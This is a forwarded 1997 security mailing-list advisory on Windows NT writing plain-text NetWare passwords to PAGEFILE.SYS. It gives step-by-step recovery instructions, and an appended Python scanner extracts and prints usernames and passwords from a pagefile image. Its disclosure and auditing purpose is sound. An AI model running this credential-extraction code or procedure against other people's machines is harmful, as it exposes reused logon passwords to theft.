[NTSEC] NT Displays Plain-Text Netware Passwords (fwd)
=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.| Ray Arachelian | "If you're gonna die, die with your|./|\.
..\|/..|[email protected]|boots on; If you're gonna try, just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin, |you're gonna die, you're gonna die!" |.\|/.
.+.v.+.|God of screwdrivers"| --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================
For with those which eternal lie, with strange eons even death may die.
---------- Forwarded message ----------
Date: Thu, 24 Apr 1997 01:37:49 -0500
From: Patrick Hayden <[email protected]>
To: [email protected]
Subject: [NTSEC] NT Displays Plain-Text Netware Passwords
Windows NT 4.0, with Microsoft's Client Services for Netware, or
Novell's IntraNetware Client for Windows NT, writes plain-text user-id
and password information to PAGEFILE.SYS. The user-id and password
apply to Netware, however, users commonly use the same logon information
for both NT and Netware. It is possible to then recover the plain-text
information by using a disk editor.
Tests have been performed (with more pending) on these systems:
Windows NT Workstation 4.0 w/SP1 and IntraNetware Client for NT (970214)
Pent. 133 Laptop 24MB RAM 50MB PAGEFILE.SYS
Windows NT Workstation 4.0 w/SP1 and Microsoft Client Services for
Netware
Dual Pent 166 64MB RAM 80MB PAGEFILE.SYS
Novell Netware 4.11 Server
1. Set /MAXMEM=12 in BOOT.INI so as to force swapping.
2. Load NT; Authenticate to NT and Netware (I used the same ID and
Password for both systems.); Verify connection by mapping a drive.
3. To ensure that sufficient swapping takes place, run a large program
(this forces the user-id and password information stored in RAM to be
placed into PAGEFILE.SYS.)
4. Exit NT; Boot to DOS; diskedit PAGEFILE.SYS
5. Search for one of the following strings (do NOT include the ""
items):
IntraNetware Client:
NWUserName="user-id"
WlMprNotifyPassword="password"
"UserName" (if the username is alone, the password will follow
very closely)
Client Services for Netware
nwcs"password" (the password is all CAPS and will immediately
follow nwcs)
In a "real-life" environment, most likely there will be enough swapping
on the system that setting the /MAXMEM switch will be unnecessary. The
switch is only to help confirm that this hole exists.
If anyone has any knowledge of this, please post it to the list.
Patrick Hayden
Security Consultant - Ernst & Young, LLP
[email protected]
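The search in steps 4 and 5 above can be done against a raw PAGEFILE.SYS image (copied off the disk from DOS or from another OS) instead of by hand in a disk editor. The scanner below is an added example, not Patrick Hayden's code: the marker strings are the ones quoted in his post; the record layout (value runs to the first non-printable byte), the additional UTF-16LE search, the all-caps filter for the CSNW hit, and the sample bytes are assumptions made here for illustration.

```python
"""Scan a raw PAGEFILE.SYS image for the NetWare client credential markers
named in the post above (added example, not the original poster's code)."""
import re
import sys
from dataclasses import dataclass

# Marker strings quoted in the post.  Whatever follows a marker, up to the
# first non-printable byte, is taken as the value.
MARKERS = {
    b"NWUserName=": "intranetware_username",
    b"WlMprNotifyPassword=": "intranetware_password",
    b"nwcs": "csnw_password",
}

# Assumption: values are NUL-terminated strings, stored either as 8-bit
# text or as UTF-16LE (the post only reports the 8-bit form seen in diskedit).
_NARROW = re.compile(rb"[\x20-\x7e]+")
_WIDE = re.compile(rb"(?:[\x20-\x7e]\x00)+")


@dataclass(frozen=True)
class Hit:
    offset: int
    encoding: str
    field: str
    value: str


def _plausible(field: str, value: str) -> bool:
    """Heuristic from the post: the CSNW password follows 'nwcs' in all
    caps, so a lowercase letter there marks an unrelated 'nwcs' string."""
    if field == "csnw_password":
        return bool(value) and not any(c.islower() for c in value)
    return bool(value)


def _scan_one(data: bytes, marker: bytes, field: str, encoding: str):
    """Yield every hit for one marker in one string encoding."""
    if encoding == "ascii":
        needle, pattern = marker, _NARROW
    else:
        needle, pattern = marker.decode("ascii").encode("utf-16-le"), _WIDE
    pos = data.find(needle)
    while pos >= 0:
        m = pattern.match(data, pos + len(needle))
        if m:
            value = m.group().decode(encoding)
            if _plausible(field, value):
                yield Hit(pos, encoding, field, value)
        pos = data.find(needle, pos + 1)


def scan_pagefile(data: bytes) -> list:
    """Return every credential-looking hit, ordered by file offset."""
    hits = []
    for marker, field in MARKERS.items():
        for encoding in ("ascii", "utf-16-le"):
            hits.extend(_scan_one(data, marker, field, encoding))
    return sorted(hits, key=lambda h: h.offset)


# Constructed sample standing in for a slice of PAGEFILE.SYS; not real data.
SAMPLE_PAGEFILE = (
    b"\x00" * 16
    + b"NWUserName=jdoe\x00\x00garbage" + b"\x00" * 8
    + b"WlMprNotifyPassword=Secret123\x00" + b"\x00" * 4
    + "nwcsSECRET123".encode("utf-16-le") + b"\x00\x00" + b"\x00" * 4
    + b"nwcsClientModule.dll\x00"   # lowercase after nwcs: rejected
    + b"nwcsSECRET123\x00"
)


def main(argv):
    if len(argv) != 2:
        print(f"usage: {argv[0]} PAGEFILE.SYS", file=sys.stderr)
        return 2
    # Pagefiles of the size in the post (50-80 MB) fit in memory; for a
    # multi-gigabyte file, read in overlapping chunks instead.
    with open(argv[1], "rb") as f:
        data = f.read()
    for h in scan_pagefile(data):
        print(f"0x{h.offset:08x} {h.encoding:9s} {h.field:22s} {h.value}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python scan_pagefile.py PAGEFILE.SYS` against an image taken while NT is not running (the file is locked while the system is up). A hit for `NWUserName=` next to a `WlMprNotifyPassword=` value is the IntraNetware case from the post; an all-caps value after `nwcs` is the Client Services for Netware case. Because the post notes users commonly reuse the same credentials for NT and NetWare, any hit should be treated as an NT password exposure as well.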